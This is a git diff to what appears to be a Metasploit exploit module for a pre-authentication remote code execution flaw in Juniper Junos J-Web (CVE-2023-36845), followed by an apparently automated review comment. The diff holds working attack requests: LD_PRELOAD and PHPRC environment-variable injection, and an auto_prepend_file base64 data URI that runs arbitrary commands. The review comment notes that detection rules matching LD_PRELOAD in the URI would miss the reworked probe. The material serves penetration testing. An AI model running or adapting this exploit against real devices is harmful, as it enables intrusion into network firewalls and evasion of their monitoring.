diff --git a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
index d68284285e18..d2f328e7e18c 100644
--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -31,6 +31,7 @@ def initialize(info = {})
 'Ron Bowes' # Target setup instructions
 ],
 'References' => [
+ [ 'URL', 'https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/'],
 [ 'URL', 'https://vulncheck.com/blog/juniper-cve-2023-36845'],
 [ 'URL', 'https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US'],
 [ 'CVE', '2023-36845']
@@ -55,9 +56,10 @@ def initialize(info = {})
 def check
 res = send_request_cgi(
- 'uri' => normalize_uri(target_uri.path, '?LD_PRELOAD=/tmp/ld'),
+ 'uri' => normalize_uri(target_uri.path),
 'method' => 'POST',
- 'ctype' => 'application/x-www-form-urlencoded'
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'data' => 'LD_PRELOAD=/tmp/ld'
 )
 return CheckCode::Appears('Environment variable manipulation succeeded indicating this target is vulnerable.') if res && res.body.include?('Cannot open "/tmp/ld"')
@@ -70,10 +72,13 @@ def execute_command(cmd, _opts = {})
 post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(cmd)}\""
 res = send_request_cgi(
- 'uri' => normalize_uri(target_uri.path, '?PHPRC=/dev/fd/0'),
+ 'uri' => normalize_uri(target_uri.path),
 'method' => 'POST',
 'data' => post_data.to_s,
- 'ctype' => 'application/x-www-form-urlencoded'
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'vars_get' => {
+ 'PHPRC' => '/dev/fd/0'
+ }
 )
 print_error('The exploitation attempt returned a response which indicates exploitation was unsuccessful.') if res
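Review bot: The two rewritten requests now carry the environment variable in different places and nothing in the code says why: `check` sends `LD_PRELOAD=/tmp/ld` as the POST body through `'data'`, while `execute_command` (last hunk) sends `PHPRC` in the query string through `'vars_get'`. A short comment above each call would record that the placement is deliberate, for example `# LD_PRELOAD goes in the POST body; execute_command passes PHPRC as a GET parameter`. Since the hash form is already used for `vars_get`, `'vars_post' => { 'LD_PRELOAD' => '/tmp/ld' }` would presumably be the matching form in `check`, provided it encodes to the same body. The module documentation should also mention the new request shape, because detection rules that look for `LD_PRELOAD=` in the request URI will no longer see this probe and need to inspect the body as well. Both method bodies continue outside their hunks.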